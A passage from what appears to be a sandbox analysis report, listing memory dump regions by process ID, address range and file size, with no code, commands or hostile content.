                                                Filesize

                                                364KB

                                              • memory/764-125-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/1352-28-0x0000000001000000-0x000000000104C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1392-171-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-208-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-188-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-207-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-115-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-149-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-118-0x0000020E33D00000-0x0000020E33D10000-memory.dmp

                                                Filesize

                                                64KB

                                              • memory/1392-132-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-210-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-209-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-162-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1392-128-0x00007FF6531A0000-0x00007FF6532C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1560-8-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/1728-85-0x00007FF6D06A0000-0x00007FF6D078E000-memory.dmp

                                                Filesize

                                                952KB

                                              • memory/1728-88-0x00007FF6D06A0000-0x00007FF6D078E000-memory.dmp

                                                Filesize

                                                952KB

                                              • memory/2060-178-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2196-160-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2256-147-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2476-92-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2476-98-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2568-139-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2632-186-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/2676-102-0x0000000010000000-0x0000000010008000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/2676-112-0x0000000000400000-0x0000000000412000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/3012-143-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3260-191-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3408-135-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3492-152-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3944-205-0x0000000000A60000-0x0000000000A72000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/4116-0-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/4116-4-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/4432-182-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/4668-169-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/4744-130-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/5100-156-0x00007FF741F50000-0x00007FF741FAB000-memory.dmp

                                                Filesize

                                                364KB